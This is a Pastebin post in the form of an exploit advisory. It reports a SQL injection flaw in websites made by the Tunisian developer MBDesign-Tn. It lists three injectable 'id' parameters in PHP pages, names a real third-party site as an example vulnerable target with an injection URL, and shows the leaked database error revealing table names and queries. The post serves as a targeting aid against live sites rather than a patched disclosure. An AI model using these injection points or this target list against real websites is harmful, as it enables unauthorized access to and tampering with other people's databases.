KingSkrupellos

Developpe par MBDesign-Tn Tunisia SQL Injection

Mar 7th, 2019
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.56 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Developpe par MBDesign-Tn Tunisia SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/03/2019
  7. # Vendor Homepage : mbdesign-tn.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ####################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Developpe par MBDesign-Tn is prone to an SQL-injection vulnerability because it fails to sufficiently
  22.  
  23. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  24.  
  25. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  26.  
  27. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  28.  
  29. application and execute arbitrary SQL commands in application`s database. Further exploitation
  30.  
  31. of this vulnerability may result in unauthorized data manipulation.
  32.  
  33. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  34.  
  35. ####################################################################
  36.  
  37. # SQL Injection Exploit :
  38. **********************
  39. /details-formation-niveau-i.php?id=[SQL Injection]
  40.  
  41. /details-actualite.php?id=[SQL Injection]
  42.  
  43. /page-simple.php?id=[SQL Injection]
  44.  
  45. ####################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. *************************
  49. [+] biotechpole.tn/details-formation-niveau-i.php?id=109%27
  50.  
  51. ####################################################################
  52.  
  53. # Example SQL Database Error :
  54. ****************************
  55. Invalid query: You have an error in your SQL syntax; check the manual that
  56. corresponds to your MySQL server version for the right syntax to use near '' at line 1
  57.  
  58. SELECT * FROM bio_module_formation_n1 WHERE id =
  59.  
  60. select * from attribution_formulaire_module where id_module= and id_formation=1
  61.  
  62. select * from question_formulaire where id_formulaire=20 order by id ASC
  63.  
  64. ####################################################################
  65.  
  66. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  67.  
  68. ####################################################################
Add Comment
Please, Sign In to add comment